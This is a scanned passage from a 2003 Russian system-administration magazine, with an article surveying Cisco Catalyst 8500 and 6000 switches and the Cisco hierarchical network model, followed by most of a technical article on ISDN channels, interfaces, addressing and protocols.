рианта. (Однако надо учесть, что файлы-устройства необ-
ходимо брать из каталога /my_dev вместо привычного /dev).
15
 администрирование

ИМПЕРИЯ
CISCO

ДЕНИС ЕЛАНСКИЙ
16

Данной публикацией мы начинаем
знакомить наших читателей с обо-
рудованием, выпускаемым фирмой
Cisco. Основанная в 1984 году, Cisco
за прошедшие годы стала признан-
ным лидером в производстве актив-
ного сетевого оборудования. Кроме
того, в настоящее время в сферу ин-
тересов компании входят не только
канонические коммутаторы и марш-
рутизаторы, но и многочисленное
оборудование и программное обес-
печение, имеющие к вычислитель-
ным сетям весьма опосредованное
отношение. Это серверы доступа,
кабели, ПО коммутаторов и марш-
рутизаторов (Cisco IOS – операци-
онная система межсетевого взаимо-
действия), ПО управления корпора-
тивными сетями (Cisco works), кон-
центраторы, интерфейсные модули
и платы расширения, системы безо-
пасности, сетевые хранилища дан-
ных, продукты телефонии, видеоси-
стемы, системы виртуальных част-
ных сетей и устройства беспровод-
ной связи.
Учитывая, что основным направ-
лением деятельности корпорации
является производство активного
сетевого оборудования (коммутато-
ров и маршрутизаторов), именно
этим устройствам и будет уделено
наибольшее внимание.
№2(3), февраль 2003
администрирование
Коммутаторы
Автор полагает, что читатель знаком
с терминологией OSI ISO, а также с
базовыми аспектами построения
ЛВС. Вкратце, коммутатор – это мно-
гопортовое устройство, работающее
на канальном уровне, что позволяет
существенно повысить производи-
тельность сетей Ethernet, а также из-
бежать ограничения 5/4/3. Основным
отличием коммутатора от повторите-
ля или концентратора является то, что
приходящие пакеты после усиления
ретранслируются не на все доступные
порты, а только на тот, канальный
адрес (MAC-адрес) которого соответ-
ствует адресу получателя. Подобная
формулировка не совсем корректна,
но вполне отображает суть дела.
В настоящее время в производ-
стве находятся следующие типы ком-
мутаторов: Cisco Catalyst (далее – CC)
8500, СС 6000, СС 5000/5500, СС
4840G, CC 4200, CC 4000, CC 3920,
CC 3900, CC 3550, CC 3500 XL, CC
3200, CC 3100, CC 2950, CC 2900 LRE
XL. CC 2900 XL, CC 1900 & 2820, CC
6400 UAC, Cisco 6000 IP DSL, Cisco
1548 MS, Cisco BPX 8600, Cisco CSS
11000, Cisco IGX 8400, Cisco LATM,
Cisco MGX 8850 IP+ATM, Cisco MGX
8200 и Cisco VCO/4K OP.
В семействе СС 8500 существует
два направления: мультисервисные
17
 администрирование
коммутаторы с функциями маршрути-
зации (8500 MSR) и коммутаторы с
функциями маршрутизации уровня
кампуса (8500 CSR).
Коммутаторы класса 8500 CSR, в
свою очередь, представлены двумя
устройствами: СС 8510 CSR и СС
8540 CSR. Принципиальная разница
между ними заключается в количе-
стве поддерживаемых портов, а сле-
довательно – в количестве плат рас-
ширения, которые могут быть интегри-
рованы в корпус коммутатора.
СС 8510CSR поддерживают следу-
ющие компоненты:

плата процессора коммутации/мар-
шрутизации;

плата 10/100 Base T (16 портов );

плата 100 Base FX (многомодовое
оптоволокно) с 8 портами, поддер-
живающими полудуплексный и пол-
нодуплексный режимы передачи,
оснащенными разъемами SC;

плата 1000 Base FX с одним гига-
битным портом, оснащенным SC-
разъемом.
Кроме того, коммутатор поддер-
живает флэш-память для хранения
системного ПО, индикаторы, отобра-
жающие состояние работы коммута-
тора, порт 10Base T, используемый
для подключения рабочей станции в
случае SNMP-управления. На плате
процессора располагается 2 разъема
PCIMCI. На этой плате интегрирова-
ны два порта: Auxiliary (AUX) и
Console. AUX-порт представлен 25-
пиновым портом EIA/TIA 232 (RS-232)
вилочного типа и используется для
подключения модема. Консольный
порт аналогичен AUX-порту. Отличие
заключается в том, что это разъем ро-
зеточного типа и используется для
подключения либо терминальной
станции, либо модема.
Коммутатор 8540 CSR, в отличие
от своего младшего собрата, имеет
13 слотов расширения и два блока пи-
тания. На него могут быть установле-
ны следующие модули:

плата процессора коммутации/
маршрутизации, включающая в
себя микропроцессор R5000 (ра-
ботает на частоте 200 МГц при ча-
стоте системной шины 100 МГц),
три типа памяти: два модуля DRAM
SIMM – для хранения входящего и
исходящего трафика и буфериза-
ции; флэш-память для хранения
18
системной информации (расширя-
ется до 16 Мб); два разъема для
дополнительной флэш-памяти. Так
же имеется интегрированный дат-
чик температуры, консольный порт
и порт 10 Base T. Данная плата
имеет внешний разъем для
PCIMCI-карт (как правило, этот
разъем используется для загруз-
ки конфигурации с внешних носи-
телей, таких как карты флэш-па-
мяти);

плата 10/100 Base T (16 портов);

плата 100 Base FX (многомодовое
оптоволокно) с шестнадцатью пор-
тами, поддерживающими полудуп-
лексный и полнодуплексный режи-
мы передачи, оснащенными разъе-
мами MT-RJ. Существуют платы с
16 или 64 Кб оперативной памяти;

плата 1000 Base FX с двумя гига-
битными портами, оснащенными
SC-разъемом (платы комплектуют-
ся оперативной памятью в разме-
ре 16 или 64 Кб);

плата 1000 Base FX с восемью ги-
габитными портами, оснащенными
SC-разъемом и оперативной памя-
тью в размере 64 Кб).
На коммутатор может быть уста-
новлено до 2 плат процессора и до 8
плат расширения (до 4 коммутацион-
ных плат на 1 процессор). Оставшие-
ся 3 слота расширения используются
для резервирования, что повышает
надежность системы.
Следующим семейством коммута-
торов является ряд Cisco Catalyst 6000,
включающий семейство СС 6000 и СС
6500. Оба эти ответвления созданы в
рамках единой концепции и различа-
ются лишь спектром и плотностью пре-
доставляемых сервисов. Аналогично
обзору восьмитысячников описание
ряда 6000 будет построено по такой же
схеме.
Сам производитель позиционирует
этот ряд как основу для высокопроиз-
водительных систем, таких как корпо-
ративные сети с насыщенным трафи-
ком и сети провайдеров услуг. Комму-
таторы этого семейства обеспечивают
интеграцию на уровне LAN/MAN/WAN,
а также межуровневую коммутацию.
Кроме того, представители этого мо-
дельного ряда обладают высокой на-
ращиваемостью и позволяют обеспе-
чить необходимое соотношение цена/
качество. Последние два качества
обеспечиваются возможностью выбо-
ра шести-, девяти – и тринадцатисло-
товых корпусов. Так, коммутаторы се-
мейства 6000 выпускаются с корпуса-
ми на 6 и 9 слотов, а линейка комму-
таторов 6500 предлагает еще и три-
надцатислотовый корпус. Все это по-
зволяет использовать от 5 до 12 моду-
лей расширения. В зависимости от ис-
полнения коммутаторы будут иметь
следующие названия: WS-C6006-NEB,
WS-C6009-NEB, WS-C6506-NEB, WS-
C6509-NEB, WS-C6513-NEB для СС
6000 и СС 6500 соответственно.

В таблице отражены специфичес-
кие особенности и преимущества
описываемого оборудования.
Еще одним положительным мо-
ментом коммутаторов этого класса
является то, что все компоненты вы-
полнены таким образом, что подле-
жат «горячей» замене (это позволя-
ет вести работы по замене/добавке
модулей без приостановки функцио-
нирования всего устройства, что по-
вышает надежность всей сети и улуч-
шает соотношение времен работос-
пособности и сбойности).
Платы расширения, поддержива-
емые комму таторами семейства
СС6000.
На момент написания этого ма-
териала существовал 31 тип интер-
фейсных плат, которые могут быть
собраны в следующие группы:

модули коммутации Ethernet и
Fast Ethernet;

модули комму тации Gigabit
Ethernet;

модули ATM;

модуль многоуровневой коммута-
ции;

модуль сетевого анализа;

модуль обработки голоса.
По причине достаточно большого
количества номенклатуры изделий,
рассмотрим только часть из них.
Первая группа включает в себя
следующие платы: WS-X6024-10FL-
MT, WS-X6224-100FX-MT, WS-
X6248-RJ-45, WS-X6248-TEL/WS-
X6248A-TEL, WS-X6324-100FX-SM,
WS-X6324-100FX-MM, WS-X6348-RJ-
45, WS-X6524-100FX-MM, WS-X6548-
RJ-21, WS-X6548-RJ-45.
Ко второй группе можно отнести
следующие модули: WS-X6316-GE-
№2(3), февраль 2003
TX, WS-X6408-GBIC/WS-X6408A-
GBIC, WS-X6416-GBIC, WS-X6416-
GBIC, WS-X6416-GE-MT, WS-X6501-
10GEX4, WS-X6502-10GE, WS-
X6516-GBIC, WS-X6516-GE-TX, WS-
X6816-GBIC.
Для упрощения понимания пояс-
ню значение символов и цифр в ко-
довых аббревиатурах.
Каждое инвентарное название
имеет строгий формат. Первые 2
символа определяют класс устрой-
ства. В данном случае это плата рас-
ширения. Последующие 4 цифры
указывают семейство коммутаторов
и количество портов. Затем указыва-
ется быстродействие портов и тип ис-
пользуемых коннекторов.
Стоит отметить, что оба представ-
ленных в статье семейства коммута-
торов относятся к третьему уровню
фирменной модели Cisco. Естествен-
но, это не означает, что устройства
серий 8500 и 6000 могут быть исполь-
зованы исключительно для построе-
ния ядра сети (Core layer). Они могут
использоваться и на уровне доступа,
и на уровне распределения (Access
и Distribution layers, соответственно).
Согласно идеологии компании, вся-
кая сетевая структура может быть
представлена в виде трех взаимо-
действующих уровней (в случае если
сеть не является вырожденной, на-
пример, используются два-три ком-
мутатора с относительно низкой про-
изводительностью и плотностью пор-
тов).
Говоря об эталонной иерархичес-
кой модели Cisco более подробно,
можно сослаться на следующую ил-
люстрацию:
Устройства уровня ядра (Core
layer), будь то коммутаторы или мар-
администрирование
шрутизаторы, предназначены для
сверхскоростной переадресации па-
кетов и для взаимодействия с гло-
бальными сетями, на этом уровне
обеспечивается избыточное резер-
вирование по связям, которое позво-
ляет многократно повысить живу-
честь системы, перенаправляя сете-
вой трафик в случае сбоев в одном
из физических каналов по другим
линиям связи.
На уровне распределения
(Distribution layer) осуществляется
контроль за доступом к службам вер-
хнего уровня, тем самым повышает-
ся эффективность использования
пропускной способности сети; кроме
того, на этом уровне используются
параметры QoS (качество обслужи-
вания), выделяя тем самым наиболее
приоритетные сетевые приложения и
службы; происходит маршрутизация
виртуальных ЛВС (VLAN), обеспече-
ние секретности и разделение состо-
яний (Area aggregation).
Что касается уровня доступа
(Access layer) – на нем решаются за-
дачи создания рабочих групп, отрас-
левых офисов – иными словами – на-
сыщение сети точками подключения.
В последующей статье будет дано
описание коммутаторов серий 5ХХХ
и 4ХХХ. Помимо этого автор возьмет
на себя смелость поэкспериментиро-
вать с настройками разного рода се-
тевых схем на базе коммутаторов и
маршрутизаторов. Подобного рода
попытки кажутся мне небесполезны-
ми хотя бы потому, что позволят ад-
министраторам, недавно работаю-
щим с сетями Cisco, избежать неко-
торых трудностей, что вполне можно
считать положительным элементом
всякой писательской деятельности.
19
АБСОЛЮТНО
ВСЕ О
ТЕХНОЛОГИИ
ISDN

С момента своего появления в странах бывшего "Cоюза"

технология ISDN мгновенно спровоцировала бурный интерес к себе со
стороны сетевых специалистов, что в первую очередь было
обусловлено распространенностью данной технологии в Европе
и, конечно же, превосходными скоростными и физическими
показателями.

СЕРГЕЙ РОПЧАН

ISDN (Integrated Services Digital Network)
– цифровые сети с интегральными
(встроенными) услугами. Эта техноло-
гия относится к сетям, в которых режим
коммутации каналов является основ-
ным, а данные обрабатываются в циф-
ровой форме. Идеи перехода телефон-
ных сетей общего пользования (ТфОП)
на полностью цифровую обработку дан-
ных высказывались давно. Сначала
предполагалось, что абоненты этой
сети будут передавать только голосо-
вые сообщения. Такие сети получили
название IDN (Integrated Digital Network).
Термин “интегрированная сеть” отно-
сился к интеграции цифровой обработ-
ки информации сетью с цифровой пе-
редачей голоса абонентом. Идея такой
сети была предложена еще в 1959 году.
Затем было решено, что такая сеть дол-
жна предоставлять своим абонентам не
только возможность поговорить между
собой, но и воспользоваться другими
услугами: факсимильной связью, теле-
ксом (передача данных между двумя
терминалами), видеотекстом (получе-
ние хранящихся в сети данных на свой
терминал), голосовой почтой и рядом
других. Предпосылка для создания та-
кого рода сетей сложилась в середине
70-х годов. К этому времени уже широ-
ко применялись цифровые каналы Т1
для передачи цифровых данных меж-
ду АТС, а первый мощный цифровой
коммутатор телефонных каналов 4ESS
был выпущен компанией Western
Electric в 1976 году.
В результате работ, проводимых по
стандартизации интегральных сетей в
ССITT, в 1980 году появился стандарт
G.705, в котором излагались общие
идеи такой сети. Конкретные специфи-
кации сети ISDN появились в 1984 году
в виде серии рекомендаций I. Этот на-
бор спецификаций был неполным и не
подходил для построения законченной
сети. К тому же в некоторых случаях он
допускал неоднозначность толкования
или был противоречивым, то есть в це-
лом все эти спецификации на то время
были “сырыми” и требовали доработки.
В результате, хотя оборудование ISDN
и начало появляться с середины 80-х
годов, оно часто было несовместимым,
особенно если производилось в разных
странах. В 1988 году рекомендации се-
рии I были пересмотрены и приобрели
более детальный и законченный вид,
хотя некоторые неоднозначности сохра-
№2(3), февраль 2003
нились. Не так давно – в 1992 и 1993
годах – стандарты ISDN были еще раз
пересмотрены и дополнены.
Само внедрение данной технологии
началось в конце 80-х годов, однако вы-
сокая технологическая сложность
пользовательского интерфейса, отсут-
ствие единых стандартов на многие
жизненно важные функции, а также не-
обходимость крупных капиталовложе-
ний для переоборудования телефонных
АТС и каналов связи привели к тому,
что процесс развития данной техноло-
гии затянулся на многие годы, и даже
сейчас, когда прошло уже более 15 лет,
распространенность сетей ISDN в на-
шей стране оставляет желать лучше-
го. Дольше всего в национальном мас-
штабе эти сети работают в таких стра-
нах, как Германия и Франция.
Если судить о тех или иных типах
глобальных сетей по коммуникационно-
му оборудованию для корпоративных
сетей, то может сложиться ложное впе-
чатление, что технология ISDN появи-
лась где-то в 1994-95 годах, так как
именно в эти годы начали появляться
первые маршрутизаторы, поддержива-
ющие технологию ISDN.
Архитектура сети ISDN предусмат-
ривает несколько видов служб:

некоммутируемые средства (выде-
ленные цифровые каналы);

коммутируемая телефонная сеть
общего пользования;

сеть передачи данных с коммутаци-
ей каналов;

сеть передачи данных с коммутаци-
ей пакетов;

сеть передачи данных с трансляци-
ей кадров;

средства контроля и управления ра-
ботой сети.
Как видно из приведенного списка,
транспортные службы сетей ISDN дей-
ствительно поддерживают очень широ-
кий спектр услуг, включая популярные
услуги frame relay. Кроме того, большое
внимание уделено средствам контроля
сети, которые позволяют маршрутизи-
ровать вызовы для установления со-
единения с абонентом сети, а также осу-
ществлять мониторинг и управление се-
тью. Управляемость сети обеспечива-
ется интеллектуальностью коммутато-
ров и конечных узлов сети, поддержи-
вающих стек протоколов, в том числе и
специальных протоколов управления.
администрирование
Стандарты ISDN описывают ряд ус-
луг прикладного уровня: факсимильную
связь на скорости 64 Кбит/с, телексную
связь на скорости 9600 бит/c, видео-
текст на скорости 9600 бит/c и некото-
рые другие.
На практике не все сети ISDN под-
держивают все стандартные службы.
Служба frame relay хотя и была разра-
ботана в рамках сети ISDN, однако ре-
ализуется, как правило, с помощью от-
дельной сети коммутаторов кадров, не
пересекающейся с сетью коммутаторов
ISDN.
Базовой скоростью сети ISDN явля-
ется скорость канала DS-0, то есть 64
Кбит/c. Эта скорость ориентируется на
самый простой способ кодирования го-
лоса – ИКМ, хотя дифференциальное
кодирование и позволяет передавать
голос с тем же качеством на скорости
32 или 16 Кбит/c.
Интерфейсы ISDN
Одним из базовых принципов ISDN яв-
ляется предоставление пользователю
стандартного интерфейса, с помощью
которого пользователь может запра-
шивать у сети разнообразные услуги.
Этот интерфейс образуется между дву-
мя типами оборудования, устанавлива-
емого в помещении пользователя (CPE,
Customer Premis-es Equipment): терми-
нальным оборудованием пользовате-
ля ТЕ (хост с соответствующим адап-
тером, маршрутизатор или телефон-
ный аппарат) и сетевым окончанием
NT, которое представляет собой уст-
ройство, завершающее канал связи с
ближайшим коммутатором ISDN.
Пользовательский интерфейс ос-
нован на каналах трех типов:

В – со скоростью передачи данных
64 Кбит/с;

D – со скоростью передачи данных
16 или 64 Кбит/с;

H – со скоростью передачи данных
384 Кбит/с (H0), 1536 Кбит/с (Н11)
или 1920 Kбит/c (Н12).
Рассмотрим каждый из каналов в
отдельности.
Каналы типа В обеспечивают пере-
дачу пользовательских данных (оциф-
рованного голоса, компьютерных дан-
ных или смеси голоса и данных) также
и с более низкими скоростями чем
64 Кбит/с. Разделение данных осуще-
ствляется с помощью техники TDM.
21
 администрирование
Разделением канала В на подканалы
в этом случае должно заниматься
пользовательское оборудование, сеть
ISDN всегда коммутирует целые кана-
лы типа В. Каналы типа В могут соеди-
нять пользователей с помощью техни-
ки коммутации каналов друг с другом,
а также образовывать так называемые
“полупостоянные” (semipermanent) со-
единения, которые эквивалентны со-
единениям службы выделенных кана-
лов. Канал типа В может также под-
ключать пользователя к коммутатору
сети Х.25.
Канал типа D выполняет две основ-
ные функции. Первой и основной яв-
ляется передача адресной информа-
ции, на основе которой осуществляет-
ся коммутация каналов типа В в ком-
мутаторах сети. Второй функцией яв-
ляется поддержание услуг низкоскоро-
стной сети с коммутацией пакетов для
пользовательских данных. Обычно эта
услуга выполняется сетью в то время,
когда каналы типа D свободны от вы-
полнения основной функции.
Каналы типа H предоставляют
пользователям возможности высоко-
скоростной передачи данных. На них
могут работать службы высокоскоро-
стной передачи факсов, видеоинфор-
мации, качественного воспроизведе-
ния звука.
Пользовательский интерфейс ISDN
представляет собой набор каналов оп-
ределенного типа с определенными
скоростями.
Сеть ISDN поддерживает два типа
пользовательского интерфейса: на-
чальный или основной (Basic Rate
Interface, BRI) и первичный (Primary
Rate Interface, PRI).
BRI – начальный интерфейс пре-
доставляет пользователю два канала
по 64 Кбит/c для передачи данных (ка-
налы типа В) и один канал с пропуск-
ной способностью 16 Кбит/с для пере-
дачи управляющей информации (ка-
нал типа D). Все каналы работают в
полнодуплексном режиме. В результа-
те суммарная скорость интерфейса
BRI для пользовательских данных со-
ставляет 144 Кбит/с по каждому на-
правлению, а с учетом служебной ин-
формации – 192 Kбит/с. Различные ка-
налы пользовательского интерфейса
разделяют один и тот же физический
двухпроводной кабель по технологии
TDM, то есть являются логическими ка-
22
налами, а не физическими. Данные по
интерфейсу BRI передаются кадрами,
состоящими из 48 бит. Каждый кадр
содержит по 2 байта каждого из кана-
лов В, а также 4 бита канала D. Пере-
дача кадра длится 250 мс, что обеспе-
чивает скорость данных 64 Кбит/с для
каналов В и 16 Кбит/с для канала D.
Кроме бит данных кадр содержит слу-
жебные биты для обеспечения синхро-
низации кадров, а также обеспечения
нулевой постоянной составляющей
электрического сигнала.
Интерфейс BRI может поддержи-
вать не только схему 2B+D, но и B+D
и просто D (когда пользователь отправ-
ляет в сеть только пакетизированные
данные). Начальный интерфейс стан-
дартизирован в рекомендации I.430.
Первичный интерфейс PRI пред-
назначен для пользователей с повы-
шенными требованиями к пропускной
способности сети. Интерфейс PRI под-
держивает либо схему 30B+D, либо
схему 23+D. В обеих схемах канал D
обеспечивает скорость 64 Кбит/с.
Первый вариант предназначен для
Европы, второй – для Северной Аме-
рики и Японии. Возможны варианты
приведения интерфейса PRI с мень-
шим количеством каналов типа В,
например, 20B+D. Каналы типа В мо-
гут объединяться в один логический
высокоскоростной канал с общей ско-
ростью до 1920 Кбит/с. При установ-
ке у пользователя нескольких интер-
фейсов PRI все они могут иметь один
канал типа D, при этом количество ка-
налов В в этом интерфейсе, который
не имеет канала D, может увеличить-
ся до 24 или 31.
Первичный интерфейс может быть
основан на каналах типа Н. При этом
общая пропускная способность интер-
фейса все равно не должна превы-
шать 2,048 или 1,544 Мбит/с. Для ка-
налов Н0 возможны интерфейсы
3Н0+D – американский вариант и
5H0+D – европейский. Для каналов
H1 возможен интерфейс, состоящий
только из одного канала H11 (1,536
Мбит/с) для американского варианта
или одного канала H12 (1920 Мбит/c)
и одного канала D для европейского
варианта.
Кадры интерфейса PRI имеют
структуру кадров DS–1 для каналов Т1
и Е1. Данный интерфейс стандартизи-
рован в рекомендации I.431.
Пользовательское
оборудование в сети ISDN
Подключение пользовательского обо-
рудования к сети ISDN осуществляет-
ся со схемой подключения, разработан-
ной ССITT. Оборудование делится на
функциональные группы, и в зависимо-
сти от группы различается несколько
справочных точек (reference points) со-
единения разных групп оборудования
между собой.
Устройства функциональной группы
NT1 (Network Termination 1) образуют
цифровое абонентское окончание
(Digital Subscriber Line, DSL) на кабеле,
соединяющем пользовательское обору-
дование с сетью ISDN. Фактически NT1
представляет собой устройство CSU,
которое работает на физическом уров-
не и образует дуплексный канал с со-
ответствующим устройством CSU, ус-
тановленным на территории оператора
сети ISDN. Справочная точка U соответ-
ствует точке подключения устройства
NT1 к сети. Устройство NT1 может при-
надлежать оператору сети, а может и
принадлежать пользователю. В Евро-
пе принято считать устройство NT1 ча-
стью оборудования сети, поэтому
пользовательское оборудование выпус-
кается без встроенного устройства NT1.
Если пользователь подключен че-
рез интерфейс BRI, то цифровое або-
нентское окончание выполнено по
двухпроводной схеме. Для организации
дуплексного режима используется тех-
нология одновременной выдачи пере-
датчиками потенциального кода 2B1Q
с эхо-подавлением и вычитанием сво-
его сигнала из суммарного. Максималь-
ная длина абонентского окончания в
этом случае составляет 5,5 км.
При использовании интерфейса PRI
цифровое абонентское окончание вы-
полняется по схеме канала T1 или Е1,
то есть является четырехпроводным с
максимальной длиной около 1800 м.
Устройства функциональной группы
NT2 (Network Termination 2) представ-
ляют собой устройства канального или
сетевого уровня, которые выполняют
функции концентрации пользовательс-
ких интерфейсов и их мультиплексиро-
вание. Например, к этому типу обору-
дования относятся: офисная АТС, ком-
мутирующая несколько интерфейсов
BRI, маршрутизатор, работающий в
режиме коммутации пакетов (напри-
мер, по каналу D), простой мультиплек-

сор TDM, который мультиплексирует
несколько низкоскоростных каналов в
один канал типа В. Точка подключения
оборудования типа NT2 к устройству
NT1 называется справочной точкой
типа Т. Наличие этого оборудования не
является обязательным в отличие от
NT1.
Устройства функциональной группы
TE1 (Terminal Equipment 1) относятся к
устройствам, которые поддерживают
интерфейс пользователя BRI или PRI.
Справочная точка S соответствует точ-
ке подключения отдельного терминаль-
ного оборудования, поддерживающего
один из интерфейсов пользователя
ISDN. Таким оборудованием может
быть телефон или факс-аппарат. Так
как оборудование типа NT2 может от-
сутствовать, то справочные точки S и T
объединяются и обозначаются как S/T.
Устройства функциональной группы
ТЕ2 (Terminail Equipment 2) представля-
ют собой устройства, которые не под-
держивают интерфейс BRI или PRI. Та-
ким устройством может быть компью-
тер, маршрутизатор с последователь-
ными интерфейсами, не относящими-
ся к ISDN, например, RS-232C, Х.21,
V.34. Для подключения такого устрой-
ства к сети ISDN необходимо исполь-
зовать терминальный адаптер (Terminal
Adapter, TA), который выпускается в
формате сетевых адаптеров как встра-
иваемая карта.
Физический интерфейс в точке S/T
представляет собой четырехпроводную
линию. Так как кабель между устрой-
ствами ТЕ1 или ТА и сетевым оконча-
нием NT1 или NT2 обычно имеет не-
большую длину, то разработчики стан-
дартов ISDN решили не усложнять обо-
рудование, так как организация дуплек-
сного режима на четырехпроводной
линии намного легче, чем на двухпро-
водной. Для интерфейса BRI в качестве
метода кодирования выбран биполяр-
ный AMI, причем логическая единица
кодируется нулевым потенциалом, а ло-
гический ноль – чередованием потен-
циалов противоположной полярности.
Для интерфейса PRI используются дру-
гие коды: те же, что и для интерфейсов
T1 и Е1, то есть соответственно B8ZS и
HDB3.
Физическая длина интерфейса PRI
колеблется от 100 м до 1000 м – в зави-
симости от схемы подключения уст-
ройств.
№2(3), февраль 2003
Дело в том, что при небольшом ко-
личестве терминалов (ТЕ1 или ТЕ2+-
ТА) разрешается не использовать ме-
стную офисную АТС, а подключать до
8 устройств к одному устройству типа
NT1 (или NT2 без коммутационных
возможностей) с помощью схемы мон-
тажного ИЛИ. При подключении одно-
го устройства ТЕ (через терминальные
резисторы R, согласующие параметры
линии) к сетевому окончанию NT дли-
на кабеля может достигать 1000 м. При
подключении нескольких устройств к
пассивному кабелю максимальная
длина сокращается до 100-200 м.
Правда, если эти устройства сосредо-
точены на дальнем конце кабеля (ме-
нее 50 м), то длина кабеля может быть
увеличена до 500 м. И наконец, суще-
ствуют специальные многопортовые
устройства NT1, которые обеспечива-
ют звездообразное подключение до 8
устройств. При этом длина кабеля уве-
личивается до 1000 м.
Адресация в ISDN
Технология ISDN разрабатывалась как
основа всемирной телекоммуникаци-
онной сети, позволяющей связывать
как телефонных абонентов, так и або-
нентов других глобальных сетей – ком-
пьютерных, телексных. Поэтому при
разработке схемы адресации узлов
ISDN необходимо было:

во-первых, сделать эту схему дос-
таточно емкой для всемирной ад-
ресации;

во-вторых, совместимой со схема-
ми адресации других сетей, чтобы
их абоненты в случае соединения
своих сетей через сеть ISDN могли
бы пользоваться привычными фор-
матами адресов. Разработчики сте-
ка TCP/IP пошли по пути внедрения
собственной схемы адресации, не-
зависимой от систем адресации
объединяемых сетей. Разработчи-
ки технологии ISDN пошли по дру-
гому пути: они решили добиться ис-
пользования в адресе ISDN адре-
сов объединяемых сетей.
Основное назначение ISDN – это
передача телефонного трафика. По-
этому за основу адреса ISDN был взят
формат международного телефонно-
го плана номеров, описанный в стан-
дарте ITU-T E.163. Однако этот фор-
мат был расширен для поддержки
администрирование
большего числа абонентов и для ис-
пользования в нем адреса других се-
тей, например Х.25. Cтандарт адреса-
ции в сетях ISDN получил номер E.164.
Формат Е.163 предусматривает до
12 десятичных цифр в номере, а фор-
мат адреса ISDN в стандарте Е.164
расширен до 55 десятичных цифр. В
сетях ISDN различают номер абонен-
та и адрес абонента. Номер абонента
соответствует точке Т подключения
всего пользовательского оборудова-
ния в сети. Например, вся офисная
АТС может идентифицироваться од-
ним номером ISDN. Номер ISDN состо-
ит из 15 десятичных цифр и делится,
как и телефонный номер, по стандар-
ту Е.163: поле “Код страны” (от 1 до 3
цифр), поле “Код города” и поле “Но-
мер абонента”. Адрес ISDN включает
номер и 40 цифр подадреса, который
используется для нумерации терми-
нальных устройств за пользовательс-
ким интерфейсом, то есть подключен-
ных к точке S. Например, если на пред-
приятии имеется офисная АТС, то ей
можно присвоить один номер, напри-
мер, 7-044-565-65-00, а для вызова
абонента имеющего адрес 235, вне-
шний абонент должен набрать номер
7-044-565-65-00-235.
При вызове абонентов из сети, не
относящейся к ISDN, их адрес может
непосредственно заменять адрес
ISDN. Например, адрес абонента сети
Х.25, в которой используется система
адресации по стандарту Х.121, ему
должно предшествовать поле префик-
са, в которое помещается код стандар-
та адресации, в данном случае стан-
дарта Х.121. Коммутаторы сети ISDN
могут обработать этот адрес коррект-
но и установить связь с нужным або-
нентом сети Х.25 через сеть ISDN, ком-
мутируя канал типа В с коммутатором
Х.25, либо передавая данные по кана-
лу типа D в режиме коммутации паке-
тов. Префикс описывается стандартом
ISO 7498.
Стандарт ISO 7498 определяет дос-
таточно сложный формат адреса, при-
чем основной схемой адресации явля-
ются первые два поля. Поле AFI (Athority
and Formay Identifier) задает значения
всех остальных полей адреса и формат
этих полей. Значением поля AFI явля-
ется один из 6 типов поддоменов гло-
бального домена адресации:

четыре типа доменов соответству-
23
 администрирование
ют четырем типам публичных теле-
коммуникационных сетей: сетей с
коммутацией пакетов, телексных
сетей, публичных телефонных се-
тей и сетей ISDN;

пятый тип домена – это географи-
ческий домен, который назначает-
ся каждой стране;

шестой тип домена – это домен
организационного типа, в который
входят международные организа-
ции, например ООН и НАТО.
За полем AFI идет поле IDI (Initial
Domain Identifier) – поле начального
идентификатора домена, а за ним рас-
полагается дополнительное поле DSP
(Domain SpecificPart), которое может
нести дополнительные цифры номера
абонента, если разрядности поля INI не
хватает.
Еще одним способом вызова або-
нентов из других сетей является указа-
ние в адресе ISDN двух адресов: адре-
са ISDN пограничного устройства, на-
пример, соединяющего сеть ISDN с се-
тью Х.25, и адреса узла в сети Х.25.
Адреса должны разделяться специаль-
ным разделителем. Два адреса исполь-
зуются за два этапа: сначала сеть ISDN
устанавливает соединение типа комму-
тируемого канала с пограничным уст-
ройством, присоединенным к сети
ISDN, а затем передает ему вторую
часть адреса, чтобы это устройство осу-
ществило соединение с требуемым
абонентом.
Стек протоколов
и структура ISDN
В сети ISDN существуют два стека про-
токолов: стек каналов типа D и стек ка-
налов типа В. Каналы типа D образуют
достаточно традиционную сеть с ком-
мутацией пакетов. Прообразом этой
сети послужила технология сетей Х.25.
Для сети каналов D определены три
уровня протоколов: физический прото-
кол определяется стандартом I.430/431,
канальный протокол LAP-D определя-
ется стандартом Q.921, а на сетевом
уровне может использоваться протокол
Q.931, с помощью которого выполняет-
ся маршрутизация вызова абонента
службы с коммутацией каналов, или же
протокол Х.25 – в этом случае в кадры
протокола LAP-D вкладываются паке-
ты Х.25, и коммутаторы ISDN выполня-
ют роль коммутаторов Х.25.
24
Сеть каналов типа D внутри сети
ISDN служит транспортным уровнем
для так называемой системы сигнали-
зации номер 7 (Signal System Number
7, SS7). Система SS7 была разработа-
на для целей внутреннего мониторинга
и управления коммутаторами телефон-
ной сети общего назначения. Эта сис-
тема применяется и в сети ISDN. Служ-
ба SS7 относится к прикладному уров-
ню модели OSI. Конечному пользова-
телю ее услуги недоступны, так как со-
общениями SS7 коммутаторы сети об-
мениваются только между собой.
Каналы типа В образуют сеть с ком-
мутацией цифровых каналов. В терми-
нах модели OSI на каналах типа В в
коммутаторах сети ISDN определен
только протокол физического уровня –
протокол I.430/431. Коммутация кана-
лов типа В происходит по указаниям,
полученным по каналам D. Когда паке-
ты протокола Q.931 маршрутизируют-
ся коммутатором, то при этом происхо-
дит одновременная коммутация оче-
редной части составного канала от ис-
ходного абонента к конечному.
Протокол LAP-D принадлежит се-
мейству HDLC и обладает всеми родо-
выми чертами этого семейства, но от-
личается некоторыми особенностями.
Адрес кадра LAP-D состоит из двух
байт: один байт определяет код служ-
бы, а второй используется для адреса-
ции одного из терминалов, если у
пользователя к сетевому окончанию
NT1 подключено несколько термина-
лов. Терминальное устройство может
поддерживать разные службы: службу
установления соединения по протоко-
лу Q.931, службу коммутации пакетов
Х.25, службу мониторинга сети и т. п.
Протокол LAP-D обеспечивает два ре-
жима работы: с установлением соеди-
нения (единственный режим работы
протокола LLC2) и без установления со-
единения. Последний режим использу-
ется для управления и мониторинга
сети.
Протокол Q.931 переносит в своих
пакетах адрес ISDN вызываемого або-
нента, на основании которого и проис-
ходит настройка коммутаторов на под-
держку составного канала типа В.
Использование служб ISDN
в корпоративных сетях
Несмотря на большие отличия от ана-
логовых телефонных сетей, сети ISDN
сегодня используются в основном так
же, как аналоговые телефонные сети,
то есть как сети с коммутацией кана-
лов, но только более скоростные. Ин-
терфейс BRI дает возможность уста-
новить дуплексный режим обмена со
скоростью 128 Кбит/с (логическое
объединение двух каналов типа В), а
